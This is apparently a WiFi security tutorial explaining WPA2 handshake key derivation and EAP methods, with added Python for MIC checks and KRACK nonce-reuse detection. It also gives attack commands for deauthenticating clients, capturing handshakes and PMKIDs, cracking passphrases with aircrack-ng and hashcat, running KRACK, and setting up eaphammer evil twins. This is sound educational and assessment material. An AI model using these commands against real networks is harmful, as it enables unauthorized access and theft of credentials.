Authentication Mechanisms and Handshake Analysis

Understanding WiFi Authentication Mechanisms - Security Protocol Analysis and Attack Vectors

What are WiFi Authentication Mechanisms?

Simple Definition: WiFi authentication mechanisms are the security protocols that verify device identity and establish secure communication channels between wireless clients and access points.

Technical Definition: WiFi authentication mechanisms encompass the cryptographic protocols, key exchange processes, and security frameworks used to authenticate wireless devices and establish secure communication channels, including four-way handshake protocols, EAP methods, and key derivation procedures.

WPA/WPA2 Four-Way Handshake Protocol

Handshake Overview and Purpose

Authentication Objective: Establish mutual authentication between client and access point while deriving session-specific encryption keys without transmitting sensitive key material.

Key Derivation Hierarchy:

Passphrase/Master Key
    ↓ (PBKDF2)
Pairwise Master Key (PMK)
    ↓ (PRF-512 with nonces)
Pairwise Transient Key (PTK)
    ↓ (Key components)
├── Key Confirmation Key (KCK) - 128 bits
├── Key Encryption Key (KEK) - 128 bits
└── Temporal Key (TK) - 128 bits

Four-Way Handshake Process

Message 1: AP → Client

AP generates ANonce (random number)
Sends: ANonce + Key Information
Purpose: Initiate handshake and provide AP nonce

Message 2: Client → AP

Client generates SNonce (random number)
Derives PTK = PRF-512(PMK, "Pairwise key expansion", 
                     AP_MAC || Client_MAC || ANonce || SNonce)
Sends: SNonce + MIC (Message Integrity Code)
Purpose: Provide client nonce and prove PMK knowledge

Message 3: AP → Client

AP derives PTK using received SNonce
Verifies MIC from Message 2
Sends: GTK (Group Temporal Key) + MIC
Purpose: Confirm authentication and distribute group key

Message 4: Client → AP

Client verifies MIC from Message 3
Installs PTK for unicast encryption
Sends: Confirmation + MIC
Purpose: Confirm successful key installation
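Worked example (added here, not part of the original material): the key hierarchy and the message 2 check described above, carried through in Python with only the standard library. It derives the PMK with PBKDF2, expands it with PRF-512 into KCK, KEK and TK, and verifies the MIC of a message 2 frame, which is the test used to judge whether a captured handshake is intact. The standard concatenates the two MAC addresses and the two nonces in sorted order, a detail the shorthand formula above leaves out; the passphrase, SSID, MACs, nonces and EAPOL frame layout used with these functions are constructed sample values.

```python
"""WPA2 key hierarchy (PMK -> PTK -> KCK/KEK/TK) and EAPOL-Key MIC verification."""
import hashlib
import hmac

# EAPOL-Key offsets: 802.1X header (4) + descriptor type (1) + Key Information (2)
# + Key Length (2) + Replay Counter (8) = 17 -> Nonce; + Nonce (32) + IV (16) + RSC (8) + ID (8) = 81 -> MIC
NONCE_OFFSET, MIC_OFFSET, MIC_LEN = 17, 81, 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PRF-512 over the *sorted* MACs and nonces (so both sides derive the same PTK),
    split into KCK, KEK and TK as in the key hierarchy above."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))[:64]
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48]}


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL frame with its MIC field zeroed: HMAC-MD5 for descriptor
    version 1 (TKIP), HMAC-SHA1 truncated to 128 bits for version 2 (CCMP)."""
    version = frame[6] & 0x07                 # low three bits of Key Information
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def build_message2(kck: bytes, snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed sample message 2 (Key Info 0x010a, no Key Data) carrying a valid MIC."""
    body = (bytes([0x02]) + (0x010A).to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce + bytes(16 + 8 + 8)   # IV, RSC, Key ID
            + bytes(MIC_LEN) + (0).to_bytes(2, "big"))                         # zero MIC, length 0
    frame = bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body          # 802.1X v2, EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def verify_message2(passphrase: str, ssid: str, aa: bytes, spa: bytes,
                    anonce: bytes, frame: bytes) -> bool:
    """True when the MIC in a captured message 2 matches the PTK for this passphrase."""
    snonce = frame[NONCE_OFFSET:NONCE_OFFSET + 32]
    kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)["KCK"]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])
```

Against a lab AP whose passphrase is known, verify_message2 returning False for a capture means the message 2 is corrupt or belongs to a different exchange, not that the capture is usable.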

Handshake Security Analysis

Cryptographic Strength:

  • PMK derived through PBKDF2 with 4096 iterations
  • PTK derived using PRF-512 with random nonces
  • MIC calculation using HMAC-SHA1 or AES-CMAC
  • Replay protection through EAPOL replay counters

Vulnerability Exposure:

  • Handshake capture enables offline password attacks
  • Weak passwords vulnerable to dictionary/brute force
  • KRACK attacks exploit handshake implementation flaws
  • Deauthentication attacks force handshake repetition

Handshake Capture and Analysis

Monitoring and Capture Techniques

Passive Handshake Capture:

# Monitor wireless interface for handshake capture
airodump-ng -c [channel] --bssid [AP_MAC] -w handshake wlan0

# Wait for natural client authentication or force with deauth
aireplay-ng --deauth 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0

# Verify handshake capture completeness
aircrack-ng handshake-01.cap

Handshake Validation and Analysis:

# Analyze captured handshake with Wireshark
wireshark handshake-01.cap

# Filter for EAPOL frames (handshake messages)
# Display filter: eapol

# Verify presence of all four handshake messages
# Message 1: Key Info = 0x0089 (from AP)
# Message 2: Key Info = 0x010a (from Client, with MIC)
# Message 3: Key Info = 0x13ca (from AP, with MIC and Encrypted)
# Message 4: Key Info = 0x030a (from Client, with MIC)
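The Key Information values listed above, decoded in Python (added example, not from the original page): the bit layout identifies which handshake message a frame is, and a completeness check pairs the replay counters so that a capture holding fragments of several exchanges is not mistaken for one complete handshake. One caveat the decoder makes visible: 0x0089 carries Key Descriptor Version 1 (HMAC-MD5 MIC, TKIP) while 0x010a, 0x13ca and 0x030a carry version 2 (HMAC-SHA1 MIC, CCMP); a single real exchange uses one version throughout, so a CCMP message 1 reads 0x008a.

```python
"""Decode the EAPOL-Key Key Information field and check a capture for a complete 4-way handshake."""

# Bit layout of the 16-bit Key Information field (IEEE 802.11 EAPOL-Key frame)
VERSION_MASK = 0x0007   # 1 = HMAC-MD5 MIC (TKIP), 2 = HMAC-SHA1-128 MIC (CCMP), 3 = AES-128-CMAC
PAIRWISE = 0x0008       # set for the 4-way handshake, clear for the group key handshake
INSTALL, ACK, MIC, SECURE = 0x0040, 0x0080, 0x0100, 0x0200
ERROR, REQUEST, ENCRYPTED = 0x0400, 0x0800, 0x1000
MIC_ALGORITHM = {1: "HMAC-MD5", 2: "HMAC-SHA1-128", 3: "AES-128-CMAC"}


def decode_key_info(key_info: int) -> dict:
    """Expand the field into named flags, the way Wireshark's EAPOL dissector shows them."""
    return {
        "mic_algorithm": MIC_ALGORITHM.get(key_info & VERSION_MASK, "unknown"),
        "pairwise": bool(key_info & PAIRWISE), "install": bool(key_info & INSTALL),
        "ack": bool(key_info & ACK), "mic": bool(key_info & MIC),
        "secure": bool(key_info & SECURE), "encrypted_key_data": bool(key_info & ENCRYPTED),
        "error": bool(key_info & ERROR), "request": bool(key_info & REQUEST),
    }


def classify_message(key_info: int):
    """Return 1..4 for a 4-way handshake message, None for anything else (RSN/WPA2 bit usage)."""
    f = decode_key_info(key_info)
    if not f["pairwise"] or f["request"]:
        return None                    # group key handshake or a client-initiated request
    if f["ack"]:
        return 3 if f["mic"] else 1    # AP -> client: message 1 has no MIC, message 3 does
    if f["mic"]:
        return 4 if f["secure"] else 2 # client -> AP: message 4 has the Secure bit set
    return None


def handshake_complete(eapol_frames) -> bool:
    """eapol_frames: (key_info, replay_counter) pairs in capture order. A usable capture needs
    M1..M4 in order with M1/M2 sharing a replay counter and M3/M4 sharing the next one; that
    pairing is what separates one real exchange from fragments of several."""
    expected, counter = 1, None
    for key_info, rc in eapol_frames:
        msg = classify_message(key_info)
        if msg == 1:                       # every M1 (re)starts the exchange; retransmits bump rc
            counter, expected = rc, 2
        elif counter is not None and msg == expected and rc == counter + (1 if msg == 3 else 0):
            counter, expected = rc, expected + 1
            if expected == 5:
                return True
    return False
```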

Advanced Handshake Analysis

PMKID Attack (Clientless Capture):

# Capture PMKID from beacon/probe response frames
hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=1

# Extract PMKID for offline analysis (hcxpcapngtool -o writes hashcat's 22000 format)
hcxpcapngtool -o pmkid.hash pmkid.pcapng

# Crack PMKID using hashcat (mode 22000; the older mode 16800 expects hcxpcaptool -z output)
hashcat -m 22000 pmkid.hash wordlist.txt

Key Derivation Verification:

  • Analyze nonce generation for randomness
  • Verify MIC calculations for integrity
  • Check key installation timing for KRACK vulnerability
  • Validate replay counter implementation

EAP (Extensible Authentication Protocol) Methods

EAP Framework Architecture

EAP Communication Flow:

Supplicant (Client) ←→ Authenticator (AP) ←→ Authentication Server (RADIUS)

Common EAP Methods:

  • EAP-TLS: Certificate-based mutual authentication
  • EAP-TTLS: Tunneled authentication with server certificates
  • EAP-PEAP: Protected EAP with server-side certificates
  • EAP-FAST: Flexible authentication via secure tunneling

EAP-TLS Implementation

Certificate-Based Authentication:

  1. TLS Handshake: Establish encrypted tunnel using certificates
  2. Certificate Validation: Verify client and server certificates
  3. Key Derivation: Generate session keys from TLS master secret
  4. Success/Failure: Complete authentication based on certificate validity

Security Advantages:

  • Strong mutual authentication through PKI
  • No password transmission over wireless medium
  • Resistance to dictionary and brute force attacks
  • Forward secrecy when an ephemeral (EC)DHE key exchange is negotiated in the TLS handshake

EAP-PEAP Implementation

Protected Authentication Process:

  1. Server Certificate Verification: Client validates server certificate
  2. TLS Tunnel Establishment: Create encrypted communication channel
  3. Inner Authentication: MSCHAPv2 or other method within tunnel
  4. Key Derivation: Generate keys from tunnel and inner authentication

Common Vulnerabilities:

  • Certificate validation bypass in client implementations
  • Inner method vulnerabilities (MSCHAPv2 weaknesses)
  • Tunnel credential leakage through implementation flaws

Authentication Attack Vectors

Dictionary and Brute Force Attacks

Offline Password Attacks:

# Standard WPA/WPA2 dictionary attack
aircrack-ng -w wordlist.txt handshake.cap

# GPU-accelerated attacks using hashcat
hashcat -m 2500 handshake.hccapx wordlist.txt

# Advanced rule-based attacks
hashcat -m 2500 handshake.hccapx wordlist.txt -r rules/best64.rule

Password Policy Analysis:

  • Common password patterns and variations
  • Date-based and location-based password generation
  • Corporate naming conventions and themes
  • Dictionary mutation rules for targeted attacks

KRACK (Key Reinstallation Attacks)

Vulnerability Mechanism:

  • Force nonce reuse through handshake manipulation
  • Exploit key reinstallation in client implementations
  • Decrypt traffic using known keystream
  • Inject malicious frames into encrypted sessions

KRACK Attack Implementation:

# KRACK attack framework (research/testing only)
./krackattack.py --target [CLIENT_MAC] --ap [AP_MAC]

# Monitor for vulnerable client behavior
# Look for nonce reuse and keystream recovery opportunities
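A defensive counterpart to the mechanism described above (added example, not from the original page or from the KRACK research code): a detector for the observable symptom of a key reinstallation, a CCMP packet number (the per-frame nonce) that repeats or goes backwards under a key that was not freshly negotiated. It also flags a plain replay, which covers the replay-counter check in the key derivation verification list earlier on this page. It works on an already-decoded stream of EAPOL message numbers and data-frame packet numbers per station; the event format and station names are constructed for the example, and a real feed would come from a capture parser.

```python
"""Detect CCMP packet-number (nonce) reuse in a decoded frame stream: the observable effect of
a KRACK key reinstallation, and of a broken replay counter (constructed events, added example)."""
from dataclasses import dataclass, field


@dataclass
class StationState:
    last_pn: int = -1                                  # highest PN seen under the current key
    handshake_msgs: set = field(default_factory=set)   # EAPOL messages seen since the last install
    fresh_key: bool = False                            # full M1..M4 just completed: PN reset is legitimate


def audit_stream(events):
    """events: ("eapol", station, message_number) or ("data", station, pn) in capture order,
    with 802.11 retransmissions (Retry bit set) removed first, since those legitimately repeat a PN.
    Returns [(event_index, station, finding), ...]; an empty list means no nonce reuse was seen."""
    findings, states = [], {}
    for idx, (kind, station, value) in enumerate(events):
        st = states.setdefault(station, StationState())
        if kind == "eapol":
            st.handshake_msgs.add(value)
            if value == 4:                                # the client installs the PTK at message 4
                if {1, 2, 3} <= st.handshake_msgs:
                    st.fresh_key = True                   # new ANonce/SNonce -> new PTK -> PN may restart
                else:
                    findings.append((idx, station, "M3/M4 without M1/M2: key reinstallation, same PTK"))
                    st.fresh_key = False
                st.handshake_msgs.clear()
        elif kind == "data":
            if st.fresh_key:
                st.last_pn, st.fresh_key = value, False   # counter restarts with the new key
            elif value == st.last_pn:
                findings.append((idx, station, f"PN {value} reused: nonce reuse under the same key"))
            elif value < st.last_pn:
                findings.append((idx, station, f"PN {value} below {st.last_pn}: replay or counter reset"))
            else:
                st.last_pn = value
    return findings
```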

Evil Twin and Rogue AP Attacks

Authentication Bypass Strategy:

  1. Rogue AP Deployment: Create convincing network duplicate
  2. Client Deauthentication: Force disconnection from legitimate AP
  3. Credential Capture: Harvest authentication attempts
  4. Man-in-the-Middle: Position for traffic interception

Advanced Authentication Analysis

Handshake Timing Analysis

Performance Assessment:

  • Authentication latency measurement
  • Handshake completion success rates
  • Roaming authentication efficiency
  • Certificate validation timing

Security Timing Analysis:

  • Nonce generation predictability
  • Key derivation implementation timing
  • Authentication failure response timing
  • Side-channel information leakage

Implementation Vulnerability Analysis

Client Implementation Testing:

# Test client certificate validation (eaphammer's wizard generates the test AP certificate)
eaphammer --cert-wizard

# Analyze EAP method downgrade susceptibility
eaphammer --interface wlan0 --channel 6 --essid "Target_Network"

Protocol Compliance Testing:

  • 802.1X standard compliance verification
  • EAP method implementation correctness
  • Certificate chain validation testing
  • Authentication state machine analysis

Tools for Authentication Analysis

Handshake Capture and Analysis

Aircrack-ng Suite: Comprehensive handshake capture and analysis toolkit

Hcxtools: Modern WiFi security analysis with PMKID support

Wireshark: Protocol analyzer for detailed handshake examination

Password Recovery and Analysis

Hashcat: Advanced password recovery with GPU acceleration

John the Ripper: Versatile password cracking tool with WPA support

Pyrit: GPU-accelerated WPA/WPA2 cracking framework

EAP and Enterprise Analysis

FreeRADIUS-WPE: RADIUS server for EAP credential capture

EAPHammer: Targeted evil twin attacks against enterprise networks

Hostapd-WPE: Access point with EAP credential logging

Professional Implementation

Security Assessment Methodology

Authentication Security Testing:

  1. Handshake Capture: Collect authentication exchanges for analysis
  2. Password Strength Assessment: Evaluate passphrase security
  3. Implementation Testing: Verify protocol compliance and security
  4. Vulnerability Scanning: Test for known authentication flaws

Defensive Recommendations

Strong Authentication Implementation:

  • Deploy complex, lengthy passwords resistant to dictionary attacks
  • Implement certificate-based authentication where feasible
  • Enable Protected Management Frames (PMF) for enhanced security
  • Monitor authentication patterns for anomaly detection

Enterprise Security Measures:

  • Deploy robust certificate validation in EAP implementations
  • Use mutual authentication methods like EAP-TLS
  • Implement network access control beyond initial authentication
  • Deploy wireless intrusion detection for authentication monitoring

Authentication Mechanisms and Handshake Analysis provide critical understanding of WiFi security protocols, enabling comprehensive assessment of authentication implementations while demonstrating both the strengths and vulnerabilities inherent in wireless authentication systems.